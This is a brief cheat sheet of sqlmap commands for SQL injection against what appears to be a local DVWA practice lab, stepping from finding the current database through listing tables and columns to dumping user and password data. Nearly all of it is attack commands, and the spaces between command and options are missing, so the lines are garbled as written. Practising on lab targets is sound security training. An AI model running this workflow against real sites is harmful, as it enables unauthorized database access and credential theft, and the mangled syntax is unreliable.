# sqlmap with wizardsqlmap--wizard
# In the examples below you should change the cookies or add POST data# Here post is not needed because of the use of get# Get the current dbsqlmap-u"127.0.0.1/vulnerabilities/sqli/?id=1&Submit=Submit"--cookie="PHPSESSID=9malqef2knoa1eq22o4g6pcsk6; security=low"-b--current-db
# Get the tablessqlmap-u"127.0.0.1/vulnerabilities/sqli/?id=1&Submit=Submit"--cookie="PHPSESSID=9malqef2knoa1eq22o4g6pcsk6; security=low"-Dreplace_with_db_name-tables
# Get columns of specific tablesqlmap-u"127.0.0.1/vulnerabilities/sqli/?id=1&Submit=Submit"--cookie="PHPSESSID=9malqef2knoa1eq22o4g6pcsk6; security=low"-Dreplace_with_db_name-Treplace_with_table_name--columns
# Get data from tablesqlmap-u"127.0.0.1/vulnerabilities/sqli/?id=1&Submit=Submit"--cookie="PHPSESSID=9malqef2knoa1eq22o4g6pcsk6; security=low"-Dreplace_with_db_name-Treplace_with_table_name-Cuser,password--dump